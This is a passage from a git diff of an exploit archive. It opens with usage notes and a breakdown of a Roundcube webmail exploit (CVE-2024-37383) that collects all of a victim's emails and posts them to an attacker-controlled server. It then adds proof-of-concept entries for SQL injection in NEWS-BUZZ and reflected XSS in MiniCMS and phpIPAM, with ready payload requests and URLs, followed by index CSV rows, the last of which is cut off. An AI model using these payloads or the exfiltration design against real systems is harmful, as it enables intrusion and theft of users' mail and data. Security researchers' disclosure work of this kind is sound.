1.6 to 1.6.6. + + +Usage Info:1 - open the Roundcube_mail_server_exploit_for_CVE-2024-37383.txt and export js file.2 - Change the web address of the original email (target) and the URL of the receiving server (attacker server).3 - You can put the code in file SVG tag and send it to the server. (can use this https://github.com/bartfroklage/CVE-2024-37383-POC)4 - After the victim clicks, all emails in the mailbox will be sent to your collaborator server. + + +This code automates the process of retrieving all messages inbox from a Roundcube webmail server and forwarding that data to a specific collaborator server endpoint.Here’s a step-by-step breakdown: +- +Setup URLs: + +- The main webmail URL (target) and the receiving server URL (attackerserver) are defined as variables at the beginning for easy configuration. + +- +Get Total Page Count: + +- The getPageCount function sends a GET request to the main webmail URL to fetch metadata, including the total number of pages (pagecount). +- If pagecount is found, it proceeds to loop through each page. + +- +Fetch Message IDs from All Pages: + +- For each page from 1 to pagecount, it constructs a paginated URL to request that page. +- Each page’s response is checked for instances of add_message_row(NUMBER) using regex, extracting message IDs from each instance and collecting all IDs in a single list. + +- +Retrieve Each Message's Content: + +- For each message ID, the code constructs a URL to request detailed data about that message. +- It sends a GET request for each message ID URL, receiving the full response HTML. + +- +Extract and Clean Message Data: + +- Within each message response, it uses regex to capture the (message title) and main message content. +- Any HTML tags are stripped from the message content to keep only the plain text. + +- +Send the Data to the Server: + +- For each extracted message, a POST request is made to the server endpoint with the title and cleaned message content, URL-encoded for proper transmission. \ No newline at end of file diff --git a/exploits/php/webapps/52174.txt b/exploits/php/webapps/52174.txt new file mode 100644 index 000000000..46f650b27 --- /dev/null +++ b/exploits/php/webapps/52174.txt @@ -0,0 +1,61 @@ +# Exploit Title: NEWS-BUZZ News Management System - SQL Injection +# Google Dork: N/A +# Exploit Author: egsec +# Date: 2024-11-03 +# Vendor Homepage: https://code-projects.org +# Software Link: https://code-projects.org/content-management-system-in-php-with-source-code-2/ +# Version: 1.0 +# Tested on: Windows 11 Pro +# Impact: The manipulation of the argument user_name with an unknown input leads to a sql injection vulnerability +# CVE : CVE-2024-10758 + +## Vulnerability Description: + +There is a SQL injection vulnerability in the login part of the index.php file. It allows an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database. + +## Vulnerable code section: + +In the source code, you can find vulnerable code in the NEWS-BUZZ/login.php file: + +<?php +... +$query = "SELECT * FROM users WHERE username = '$username'"; +$result = mysqli_query($conn, $query) or die(mysqli_error($conn)); +... +?> + +In this line, the $username variable is directly embedded into the SQL query without proper handling. This allows an attacker to inject malicious SQL code. + +## Proof of Concept (PoC): + +1.Location: http://localhost/NEWS-BUZZ/index.php + +2.Time-Based SQL Injection Payload: ' OR sleep(10)# + + +3.PoC request: + +POST /NEWS-BUZZ/login.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 69 +Origin: http://localhost +Connection: close +Referer: http://localhost/NEWS-BUZZ/index.php +Cookie: PHPSESSID=456n0gcbd6d09ecem39lrh3nu9 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Priority: u=0, i + +user_name=admin%27+or+sleep%2810%29%23&user_password=adminpass&login= + +4.PoC response: + +The response will come called time by using sleep() function. \ No newline at end of file diff --git a/exploits/php/webapps/52175.txt b/exploits/php/webapps/52175.txt new file mode 100644 index 000000000..3f3d0412d --- /dev/null +++ b/exploits/php/webapps/52175.txt @@ -0,0 +1,16 @@ +# Exploit Title: [MiniCMS 1.1 Cross-Site Scripting (XSS) in date Parameter of mc-admin/page.php] +# Date: [2024-10-26] +# Exploit Author: [CodeSecLab] +# Vendor Homepage: [https://github.com/bg5sbk/MiniCMS] +# Software Link: [https://github.com/bg5sbk/MiniCMS] +# Version: [1.10] +# Tested on: [Ubuntu Windows] +# CVE : [CVE-2018-1000638] + +PoC: +GET http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script> + +Details: +{ "Sink": "echo $filter_date;", "Vulnerable Variable": "filter_date", "Source": "GET parameter 'date'", "Sanitization Mechanisms Before Patch": "None (directly echoed without encoding)", "Sink Context Constraints": "Injected in HTML attribute (URL query string)", "Attack Payload": ""><script>alert('XSS')</script>", "Execution Path Constraints": "The 'date' GET parameter must be set in the URL query string and passed without filtering", "Request URL": "http://minicms/mc-admin/page.php?date=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E", "Request Parameter":"date","Request Method": "GET", "Final PoC": "http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>" } + +[Replace Your Domain Name] \ No newline at end of file diff --git a/exploits/php/webapps/52176.txt b/exploits/php/webapps/52176.txt new file mode 100644 index 000000000..f6300903f --- /dev/null +++ b/exploits/php/webapps/52176.txt @@ -0,0 +1,27 @@ +# Exploit Title: [phpIPAM 1.6 Reflected XSS via closeClass Parameter in popup.php] +# Date: [2024-10-26] +# Exploit Author: [CodeSecLab] +# Vendor Homepage: [https://github.com/phpipam/phpipam] +# Software Link: [https://github.com/phpipam/phpipam] +# Version: [1.5.1] +# Tested on: [Ubuntu Windows] +# CVE : [CVE-2023-24657] +PoC: +1)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(1)%3C/script%3E +2)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22 +Details: +{ + "Sink": "print @$_REQUEST['closeClass']", + "Vulnerable Variable": "closeClass", + "Source": "$_REQUEST['closeClass']", + "Sanitization Mechanisms Before Patch": "None", + "Sink Context Constraints": "Reflected within HTML attributes without escaping", + "Attack Payload": "\" onclick=\"alert(1)\"", + "Execution Path Constraints": "Directly accessed from the 'closeClass' parameter without modification", + "Request URL": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22", + "Request Method": "GET", + "Final PoC": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22" +} + + +[Replace Your Domain Name] \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0df3b6e22..7f215d5ae 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10397,7 +10397,15 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 3851,exploits/multiple/dos/3851.c,"ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-Sébastien,dos,multiple,,2007-05-03,2017-10-07,1,CVE-2007-1669,,,,, 42294,exploits/multiple/dos/42294.py,"Zookeeper 3.5.2 Client - Denial of Service",2017-07-02,"Brandon Dennis",dos,multiple,2181,2017-07-04,2017-10-04,0,CVE-2017-5637,,,,, 32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",dos,multiple,,2008-11-12,2014-03-30,1,CVE-2008-5102;OSVDB-50487,,,,,https://www.securityfocus.com/bid/32267/info +52182,exploits/multiple/hardware/52182.txt,"ABB Cylon Aspect 3.08.02 - PHP Session Fixation",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,, +52180,exploits/multiple/hardware/52180.txt,"ABB Cylon FLXeon 9.3.4 - Cross-Site Request Forgery",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,, +52179,exploits/multiple/hardware/52179.txt,"ABB Cylon FLXeon 9.3.4 - Default Credentials",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,, +52188,exploits/multiple/hardware/52188.txt,"ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48841,,,,, +52186,exploits/multiple/hardware/52186.txt,"ABB Cylon FLXeon 9.3.4 - Remote Code Execution (RCE)",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48841,,,,, +52178,exploits/multiple/hardware/52178.txt,"ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48852,,,,, +52184,exploits/multiple/hardware/52184.txt,"ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48849,,,,, 52160,exploits/multiple/hardware/52160.py,"Cosy+ firmware 21.2s7 - Command Injection",2025-04-10,CodeB0ss,hardware,multiple,,2025-04-10,2025-04-10,0,CVE-2024-33896,,,,, +52183,exploits/multiple/hardware/52183.txt,"Netman 204 - Remote command without authentication",2025-04-11,"Parsa Rezaie Khiabanloo",hardware,multiple,,2025-04-11,2025-04-11,0,,,,,, 11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,, 51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,, 38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,, @@ -10541,6 +10549,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 288,exploits/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Local Privilege Escalation",2001-03-04,"the itch",local,multiple,,2001-03-03,,1,,,,,, 51983,exploits/multiple/local/51983.txt,"PrusaSlicer 2.6.1 - Arbitrary code execution",2024-04-12,"Kamil Breński",local,multiple,,2024-04-12,2024-04-12,0,,,,,, 43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2016-0772,,,,,https://github.com/tintinweb/pub/tree/11f6ebda59ad878377df78351f8ab580660d0024/pocs/cve-2016-0772 +52190,exploits/multiple/local/52190.py,"qBittorrent 5.0.1 - MITM RCE",2025-04-11,"Jordan Sharp",local,multiple,,2025-04-11,2025-04-11,0,CVE-2024-51774,,,,, 21078,exploits/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",local,multiple,,2001-08-23,2012-09-05,1,CVE-2001-1003;OSVDB-11802,,,,,https://www.securityfocus.com/bid/3228/info 47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2017-5899,,,,,https://github.com/bcoles/local-exploits/blob/3c5cd80a7c59ccd29a2c2a1cdbf71e0de8e66c11/CVE-2017-5899/exploit.sh 49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,,2020-11-27,2020-11-27,0,,,,,, @@ -11808,6 +11817,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50317,exploits/multiple/webapps/50317.txt,"Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)",2021-09-22,"Akıner Kısa",webapps,multiple,,2021-09-22,2021-09-22,0,CVE-2021-40868,,,,, 50527,exploits/multiple/webapps/50527.txt,"CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)",2021-11-16,"Hosein Vita",webapps,multiple,,2021-11-16,2021-11-16,0,,,,,, 9727,exploits/multiple/webapps/9727.txt,"CMScontrol (Content Management Portal Solutions) - SQL Injection",2009-09-21,ph1l1ster,webapps,multiple,,2009-09-20,,1,OSVDB-58292;CVE-2009-3326,,,,, +52181,exploits/multiple/webapps/52181.txt,"CMU CERT/CC VINCE 2.0.6 - Stored XSS",2025-04-11,LiquidWorm,webapps,multiple,,2025-04-11,2025-04-11,0,,,,,, 50185,exploits/multiple/webapps/50185.py,"Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection",2021-08-10,"Brian Ombongi",webapps,multiple,,2021-08-10,2021-08-10,0,CVE-2020-35848;CVE-2020-35847,,,,http://www.exploit-db.comcockpit-0.11.1.zip, 49397,exploits/multiple/webapps/49397.txt,"Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)",2021-01-08,"Metin Yunus Kandemir",webapps,multiple,,2021-01-08,2021-01-08,0,,,,,, 42610,exploits/multiple/webapps/42610.txt,"CodeMeter 6.50 - Cross-Site Scripting",2017-09-04,Vulnerability-Lab,webapps,multiple,,2017-09-04,2017-09-04,0,CVE-2017-13754,,,,,https://www.vulnerability-lab.com/get_content.php?id=2074 @@ -11837,6 +11847,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 18473,exploits/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - Remote File Inclusion",2012-02-08,Vulnerability-Lab,webapps,multiple,,2012-02-08,2012-02-08,0,OSVDB-79326;CVE-2012-1047,,,,,https://www.vulnerability-lab.com/get_content.php?id=405 47063,exploits/multiple/webapps/47063.html,"CyberPanel 1.8.4 - Cross-Site Request Forgery",2019-07-01,"Bilgi Birikim Sistemleri",webapps,multiple,,2019-07-01,2019-07-03,0,,"Cross-Site Request Forgery (CSRF)",,,, 50230,exploits/multiple/webapps/50230.py,"CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)",2021-08-27,"numan türle",webapps,multiple,,2021-08-27,2021-08-27,0,,,,,, +52172,exploits/multiple/webapps/52172.py,"CyberPanel 2.3.6 - Remote Code Execution (RCE)",2025-04-11,"Luka Petrovic (refr4g)",webapps,multiple,,2025-04-11,2025-04-11,0,CVE-2024-51378,,,,, 50909,exploits/multiple/webapps/50909.txt,"Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)",2022-05-11,"Tin Pham",webapps,multiple,,2022-05-11,2022-05-11,0,CVE-2021-31673,,,,, 50908,exploits/multiple/webapps/50908.txt,"Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)",2022-05-11,"Tin Pham",webapps,multiple,,2022-05-11,2022-05-11,0,CVE-2021-31674,,,,, 43847,exploits/multiple/webapps/43847.py,"DarkComet (C2 Server) - File Upload",2018-01-15,"Pseudo Laboratories",webapps,multiple,,2018-01-21,2018-01-21,0,,Malware,,,,https://pseudolaboratories.github.io/DarkComet-upload-vulnerability/ @@ -11933,6 +11944,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,, 37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,, 52144,exploits/multiple/webapps/52144.txt,"GeoVision GV-ASManager 6.1.0.0 - Information Disclosure",2025-04-08,"Giorgi Dograshvili",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2024-56902,,,,, +52189,exploits/multiple/webapps/52189.txt,"GeoVision GV-ASManager 6.1.0.0 - Broken Access Control",2025-04-11,"Giorgi Dograshvili",webapps,multiple,,2025-04-11,2025-04-11,0,CVE-2024-56898,,,,, +52187,exploits/multiple/webapps/52187.txt,"GeoVision GV-ASManager 6.1.1.0 - CSRF",2025-04-11,"Giorgi Dograshvili",webapps,multiple,,2025-04-11,2025-04-11,0,CVE-2024-56901,,,,, 50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,,2021-08-05,2021-08-05,0,,,,,, 47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,,2019-09-23,2019-09-23,0,CVE-2019-16679,,,,http://www.exploit-db.comgila-1.10.9.zip, 49571,exploits/multiple/webapps/49571.py,"Gitea 1.12.5 - Remote Code Execution (Authenticated)",2021-02-18,Podalirius,webapps,multiple,,2021-02-18,2021-06-14,0,,,,,, @@ -12065,6 +12078,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49081,exploits/multiple/webapps/49081.py,"M/Monit 3.7.4 - Password Disclosure",2020-11-19,"Dolev Farhi",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,, 49080,exploits/multiple/webapps/49080.py,"M/Monit 3.7.4 - Privilege Escalation",2020-11-19,"Dolev Farhi",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,, 51847,exploits/multiple/webapps/51847.txt,"Magento ver. 2.4.6 - XSLT Server Side Injection",2024-03-03,tmrswrr,webapps,multiple,,2024-03-03,2024-03-03,0,,,,,, +52170,exploits/multiple/webapps/52170.txt,"MagnusSolution magnusbilling 7.3.0 - Command Injection",2025-04-11,CodeSecLab,webapps,multiple,,2025-04-11,2025-04-11,0,CVE-2023-30258,,,,, 50971,exploits/multiple/webapps/50971.txt,"Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)",2022-06-27,Vulnz,webapps,multiple,,2022-06-27,2022-06-27,0,,,,,, 9714,exploits/multiple/webapps/9714.txt,"Mambo Component com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",webapps,multiple,,2009-10-17,,1,OSVDB-58288;CVE-2009-3333,,,,, 39236,exploits/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution",2016-01-14,"Bikramaditya Guha",webapps,multiple,,2016-01-14,2016-01-14,0,OSVDB-133027,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5291.php @@ -12121,6 +12135,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50428,exploits/multiple/webapps/50428.txt,"myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)",2021-10-19,"RedTeam Pentesting GmbH",webapps,multiple,,2021-10-19,2021-10-19,0,CVE-2021-42566;CVE-2021-42565,,,,, 48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,,2020-08-28,2020-08-28,0,,,,,, 49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,, +52177,exploits/multiple/webapps/52177.md,"Nagios Log Server 2024R1.3.1 - API Key Exposure",2025-04-11,"Seth Kraft",webapps,multiple,,2025-04-11,2025-04-11,0,,,,,, 52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-03,0,,,,,, 52138,exploits/multiple/webapps/52138.txt,"Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)",2025-04-08,"Calil Khalil",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2019-15949,,,,, 51925,exploits/multiple/webapps/51925.py,"Nagios XI Version 2024R1.01 - SQL Injection",2024-03-25,"Jarod Jaslow (MAWK)",webapps,multiple,,2024-03-25,2024-03-25,0,,,,,, @@ -12399,6 +12414,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31234,exploits/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic?id' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",webapps,multiple,,2008-02-18,2014-01-28,1,CVE-2008-5674;OSVDB-42928,,,,,https://www.securityfocus.com/bid/27875/info 50463,exploits/multiple/webapps/50463.txt,"WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)",2021-10-29,3ndG4me,webapps,multiple,,2021-10-29,2021-10-29,0,CVE-2021-31682,,,,, 49170,exploits/multiple/webapps/49170.txt,"WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass",2020-12-02,"Aakash Madaan",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,, +52185,exploits/multiple/webapps/52185.txt,"WebFileSys 2.31.0 - Directory Path Traversal",2025-04-11,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-11,2025-04-11,0,CVE-2024-53586,,,,, 42106,exploits/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",webapps,multiple,,2017-06-01,2017-06-01,1,,"Cross-Site Scripting (XSS)",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1197 42066,exploits/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",webapps,multiple,,2017-05-25,2017-05-25,1,CVE-2017-2508,"Cross-Site Scripting (XSS)",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1146 42065,exploits/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",webapps,multiple,,2017-05-25,2017-05-25,1,,"Cross-Site Scripting (XSS)",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1134 @@ -18690,6 +18706,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 52054,exploits/php/webapps/52054.txt,"Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)",2024-06-26,tmrswrr,webapps,php,,2024-06-26,2024-06-26,0,,,,,, 8549,exploits/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php' Local File Inclusion",2009-04-27,SirGod,webapps,php,,2009-04-26,,1,OSVDB-54111;CVE-2009-1486,,,,, 1405,exploits/php/webapps/1405.pl,"FlatCMS 1.01 - 'file_editor.php' Remote Command Execution",2006-01-04,cijfer,webapps,php,,2006-01-03,,1,,,,,, +52166,exploits/php/webapps/52166.txt,"flatCore 1.5 - Cross Site Request Forgery (CSRF)",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2019-13961,,,,, 52165,exploits/php/webapps/52165.txt,"flatCore 1.5.5 - Arbitrary File Upload",2025-04-10,CodeSecLab,webapps,php,,2025-04-10,2025-04-10,0,CVE-2019-10652,,,,, 50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",2021-09-06,"Mason Soroka-Gill",webapps,php,,2021-09-06,2021-09-06,0,CVE-2021-39608,,,,http://www.exploit-db.comflatCore-CMS-2.0.7.tar.gz, 51068,exploits/php/webapps/51068.txt,"FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)",2023-03-27,"Sinem Şahin",webapps,php,,2023-03-27,2023-03-27,0,,,,,, @@ -19343,6 +19360,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49798,exploits/php/webapps/49798.py,"GetSimple CMS My SMTP Contact Plugin 1.1.2 - Persistent Cross-Site Scripting",2021-04-23,boku,webapps,php,,2021-04-23,2021-11-01,0,,,,,, 48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php,,2020-08-13,2020-08-13,0,,,,,, 51475,exploits/php/webapps/51475.py,"GetSimple CMS v3.3.16 - Remote Code Execution (RCE)",2023-05-23,"Youssef Muhammad",webapps,php,,2023-05-23,2023-05-26,1,CVE-2022-41544,,,,, +52168,exploits/php/webapps/52168.txt,"GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2021-28976,,,,, 4738,exploits/php/webapps/4738.txt,"gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion",2007-12-18,MhZ91,webapps,php,,2007-12-17,2016-10-20,1,OSVDB-44780;CVE-2007-6476;OSVDB-44779;CVE-2007-6475;OSVDB-41376;CVE-2007-6474;OSVDB-41375,,,,http://www.exploit-db.comGF-3XPLORER_2.4_.rar, 645,exploits/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,webapps,php,,2004-11-20,,1,OSVDB-11626,,,,,http://www.zone-h.org/advisories/read/id=4904 25693,exploits/php/webapps/25693.txt,"GForge 3.x - Arbitrary Command Execution",2005-05-24,"Filippo Spike Morelli",webapps,php,,2005-05-24,2013-05-24,1,CVE-2005-1752;OSVDB-16930,,,,,https://www.securityfocus.com/bid/13716/info @@ -19436,6 +19454,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 17992,exploits/php/webapps/17992.txt,"GNUBoard 4.33.02 - 'tp.php?PATH_INFO' SQL Injection",2011-10-17,flyh4t,webapps,php,,2011-10-17,2017-10-17,0,CVE-2011-4066;OSVDB-76614,,,,, 36973,exploits/php/webapps/36973.txt,"GNUBoard 4.34.20 - 'download.php' HTML Injection",2012-03-20,wh1ant,webapps,php,,2012-03-20,2015-05-11,1,CVE-2012-4873;OSVDB-80217,,,,,https://www.securityfocus.com/bid/52622/info 39116,exploits/php/webapps/39116.txt,"GNUBoard 4.3x - 'ajax.autosave.php' Multiple SQL Injections",2014-03-19,"Claepo Wang",webapps,php,,2014-03-19,2015-12-29,1,CVE-2014-2339;OSVDB-104445,,,,,https://www.securityfocus.com/bid/66228/info +52167,exploits/php/webapps/52167.txt,"Gnuboard5 5.3.2.8 - SQL Injection",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2020-18662,,,,, 3876,exploits/php/webapps/3876.txt,"GNUEDU 1.3b2 - Multiple Remote File Inclusions",2007-05-08,GoLd_M,webapps,php,,2007-05-07,,1,OSVDB-38256;CVE-2007-2609;OSVDB-38255;OSVDB-38254;OSVDB-38253;OSVDB-38252;OSVDB-38251;OSVDB-38250;OSVDB-38249;OSVDB-38248,,,,, 32207,exploits/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",webapps,php,80,2014-03-12,2014-03-12,1,OSVDB-104385;OSVDB-104384,,,,http://www.exploit-db.comgnupanel_lenny_squeeze_wheezy_precise_0.3.5_R4.tar.bz2, 30082,exploits/php/webapps/30082.txt,"GNUTurk - 'Mods.php' Cross-Site Scripting",2007-05-25,vagrant,webapps,php,,2007-05-25,2013-12-06,1,CVE-2007-2879;OSVDB-38139,,,,,https://www.securityfocus.com/bid/24152/info @@ -22640,6 +22659,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40545,exploits/php/webapps/40545.txt,"Learning Management System 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php,,2016-10-17,2016-10-19,0,,,,,http://www.exploit-db.comlms.zip, 45635,exploits/php/webapps/45635.txt,"Learning with Texts 1.6.2 - 'start' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php,,2018-10-18,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comlwt_v_1_6_2.zip, 4680,exploits/php/webapps/4680.txt,"LearnLoop 2.0beta7 - 'sFilePath' Remote File Disclosure",2007-11-29,GoLd_M,webapps,php,,2007-11-28,2016-10-20,1,OSVDB-39698;CVE-2007-6214,,,,http://www.exploit-db.comlearnloop2.0beta7.tar.gz, +52171,exploits/php/webapps/52171.txt,"LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection",2025-04-11,"Francisco Moraga (BTshell)",webapps,php,,2025-04-11,2025-04-11,0,CVE-2024-8522,,,,, 23313,exploits/php/webapps/23313.txt,"Ledscripts LedForums - Multiple HTML Injections",2003-10-30,ProXy,webapps,php,,2003-10-30,2012-12-12,1,CVE-2003-1197;OSVDB-8934,,,,,https://www.securityfocus.com/bid/8934/info 38908,exploits/php/webapps/38908.txt,"Leed - 'id' SQL Injection",2013-12-18,"Alexandre Herzog",webapps,php,,2013-12-18,2015-12-08,1,CVE-2013-2627;OSVDB-101156,,,,,https://www.securityfocus.com/bid/64426/info 10930,exploits/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 - SQL Injection",2010-01-02,Sora,webapps,php,,2010-01-01,,1,OSVDB-61472;CVE-2010-0980,,,,http://www.exploit-db.coml4d_stats_web.zip, @@ -23674,6 +23694,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 27125,exploits/php/webapps/27125.txt,"miniBloggie 1.0 - 'login.php' SQL Injection",2006-01-24,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-24,2013-07-27,1,CVE-2006-0417;OSVDB-22729,,,,,https://www.securityfocus.com/bid/16367/info 2519,exploits/php/webapps/2519.txt,"Minichat 6.0 - 'ftag.php' Remote File Inclusion",2006-10-11,Zickox,webapps,php,,2006-10-10,,1,OSVDB-29693;CVE-2006-5283,,,,, 18410,exploits/php/webapps/18410.txt,"MiniCMS 1.0/2.0 - PHP Code Injection",2012-01-22,Or4nG.M4N,webapps,php,,2012-01-22,2012-01-22,0,OSVDB-82331;OSVDB-82330;CVE-2012-5231,,,,, +52175,exploits/php/webapps/52175.txt,"MiniCMS 1.1 - Cross Site 